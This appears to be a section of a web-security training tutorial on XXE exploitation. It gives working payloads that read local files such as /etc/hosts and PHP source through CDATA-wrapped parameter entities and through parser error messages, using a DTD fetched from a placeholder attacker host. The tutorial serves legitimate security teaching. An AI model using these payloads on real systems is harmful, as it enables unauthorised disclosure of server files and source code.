Advanced Exfiltration with CDATA
For PHP web apps, we can use PHP filters to encode and read source files.
But what about other types of web apps?
To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA tag (e.g. <![CDATA[ FILE_CONTENT ]]>).
This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.
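A first attempt at this idea could be sketched as below. This is an illustration only: the root name is a placeholder, the file path is the one used later in this section, and the entity names begin, file and end are assumptions chosen to match the joined entity discussed next.

```xml
<!DOCTYPE root [
  <!-- opening half of the CDATA wrapper -->
  <!ENTITY begin "<![CDATA[">
  <!-- external file we want to read (path assumed from later in this section) -->
  <!ENTITY file SYSTEM "file:///var/www/html/submitDetails.php">
  <!-- closing half of the CDATA wrapper -->
  <!ENTITY end "]]>">
  <!-- naive attempt to join the three parts into a single entity -->
  <!ENTITY joined "&begin;&file;&end;">
]>
```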
After that, if we reference the &joined; entity, it should contain our escaped data. However, this will not work, since XML prevents joining internal and external entities, so we will have to find another way to do so.
To bypass this limitation, we can utilize XML Parameter Entities, a special type of entity that starts with a % character and can only be used within the DTD. What’s unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:
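A minimal sketch of that joining line, assuming the three parameter entities are named begin, file and end (these names are illustrative and must match whatever the request's DTD declares):

```xml
<!-- joins three parameter entities into one general entity named joined -->
<!ENTITY joined "%begin;%file;%end;">
```

Because this declaration is loaded from an external DTD, the parameter entity references inside the entity value are expanded when the declaration is parsed.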
So, let’s try to read the submitDetails.php file by first storing the above line in a DTD file (e.g. xxe.dtd), hosting it on our machine, and then referencing it as an external entity on the target web application.
Now, we can reference our external entity (xxe.dtd) and then print the &joined; entity we defined above, which should contain the content of the submitDetails.php file, as follows:
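The request body could look roughly like the sketch below. OUR_IP and port 8000 are placeholders for wherever xxe.dtd is hosted, the root element stands in for whichever element the target application reflects in its response, and the file path is assumed from later in this section.

```xml
<!DOCTYPE root [
  <!-- opening half of the CDATA wrapper -->
  <!ENTITY % begin "<![CDATA[">
  <!-- external file to read -->
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
  <!-- closing half of the CDATA wrapper -->
  <!ENTITY % end "]]>">
  <!-- load our hosted DTD, which declares the joined entity -->
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %xxe;
]>
<!-- reference the joined entity inside an element the application displays -->
<root>&joined;</root>
```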
Once we write our xxe.dtd file, host it on our machine, and add the above lines to our HTTP request to the vulnerable web application, we finally get the content of the submitDetails.php file.
Error Based XXE
If the web app does not write any of our XML input back to the response, we are blind to the output of the XXE.
If the web application displays runtime errors (e.g., PHP errors) and does not have proper exception handling for the XML input, then we can use this flaw to read the output of the XXE exploit.
Let’s say none of the XML input entities is displayed on the screen.
We first try sending malformed XML data and see if the web app displays any errors.
To do so, we can delete any of the closing tags, or change one of them so that it does not close (e.g. <roo> instead of <root>).
When we do that, the web app returns an error that reveals the web server directory, which we can use to read the source code of other files.
Let’s exploit this flaw and read file content.
We will first host a DTD file that contains the following payload:
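A sketch of such a DTD, assuming the file to read is /etc/hosts (the file mentioned later in this section). The inner entity name content is illustrative; exactly how the undefined reference is reported depends on the parser.

```xml
<!-- external file whose content we want to leak through an error message -->
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!-- error joins an undefined parameter entity with the file content -->
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
```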
The above payload defines the file parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, %nonExistingEntity; does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined %file; as part of the error. Many other things can also cause an error, like a bad URI or bad characters in the referenced file.
Now, we can call our external DTD script, and then reference the error entity, as follows:
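The XML sent to the target could then be as short as the sketch below. OUR_IP and port 8000 are placeholders for our own host, root is an illustrative DOCTYPE name, and remote is an assumed name for the parameter entity that loads the DTD.

```xml
<!DOCTYPE root [
  <!-- load the hosted DTD that declares the file and error entities -->
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  <!-- referencing error is what triggers the failing lookup -->
  %error;
]>
```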
Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we get the content of the /etc/hosts file as part of the error message.
This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. "file:///var/www/html/submitDetails.php"). However, this method is not as reliable as the previous method for reading source files, as it may have length limitations, and certain special characters may still break it.